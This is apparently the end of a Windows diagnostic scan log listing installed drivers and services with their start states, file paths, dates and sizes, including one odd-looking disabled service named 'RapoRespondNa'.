S3 LGBusEnum;Logitech Gaming Virtual Bus Enumerator Driver; C:\Windows\system32\drivers\LGBusEnum.sys [2018-05-07 36496]
S3 LGJoyXlCore;Logitech Translation Layer Driver (LGS); C:\Windows\system32\drivers\LGJoyXlCore.sys [2018-05-07 67736]
S3 LGVirHid;Logitech Gamepanel Virtual HID Device Driver; C:\Windows\system32\drivers\LGVirHid.sys [2018-05-07 26008]
S3 MADFUOZONE;Service for M-Audio Ozone DFU; C:\Windows\system32\DRIVERS\MAudioOzone_DFU.sys [2010-03-31 46088]
S3 MAUSBOZONE;Service for M-Audio Ozone; C:\Windows\system32\DRIVERS\MAudioOzone.sys [2010-03-31 187912]
S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]
S3 pgusbmme;usb-audio.de MME-Adapter; C:\Windows\system32\drivers\pgusbmm3.sys [2010-08-13 49728]
S3 pgusbwdm;usb-audio.de driver (commercial 2.8.45); C:\Windows\System32\Drivers\pgusbwdm.sys [2010-08-13 466496]
S3 piddrv64;piddrv64; \??\C:\Windows\piddrv64.sys [2019-11-30 37256]
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2010-11-21 165888]
S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-21 6656]
S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-21 34688]
S3 SWDUMon;SWDUMon; C:\Windows\system32\DRIVERS\SWDUMon.sys [2018-08-11 25608]
S3 tapwindscribe0901;Windscribe VPN; C:\Windows\system32\DRIVERS\tapwindscribe0901.sys [2018-02-01 45560]
S3 tapwp01;TAP-Windows Adapter V9 (WiFi Protector); C:\Windows\system32\DRIVERS\tapwp01.sys [2014-12-11 40664]
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2010-11-21 59392]
S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2010-11-21 31232]
S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-21 199552]
S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-21 21760]
S3 WmFilter;Logitech Gaming HID Filter Driver; C:\Windows\system32\drivers\WmFilter.sys [2010-04-27 43976]
S3 WmVirHid;Logitech Virtual Hid Device Driver; C:\Windows\system32\drivers\WmVirHid.sys [2010-04-27 16200]
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2009-07-14 27136]
R3 CCleanerPerformanceOptimizerService;CCleaner Performance Optimizer Service; C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe [2022-11-09 1003344]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2015-11-05 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2015-11-05 125112]
S2 HPSLPSVC;HP Network Devices Support; C:\Windows\system32\svchost.exe [2009-07-14 27136]
S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2009-07-14 27136]
S3 GalaxyClientService;GalaxyClientService; C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe [2020-06-13 1748552]
S3 GalaxyCommunication;GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [2020-02-24 6821960]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [2005-04-03 69632]
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2022-12-01 231328]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2009-07-14 27136]
S3 StorSvc;@%SystemRoot%\System32\StorSvc.dll,-100; C:\Windows\System32\svchost.exe [2009-07-14 27136]
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2009-07-14 27136]
S4 aspnet_state;Stavová služba ASP.NET; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2015-11-05 51376]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2015-11-05 135848]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2015-11-05 135848]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2015-11-05 135848]
S4 RapoRespondNa;RapoRespondNa; C:\Program Files (x86)\RapoRespondNa\RapoRespondNa.exe -system -token 5e227c []
-----------------EOF-----------------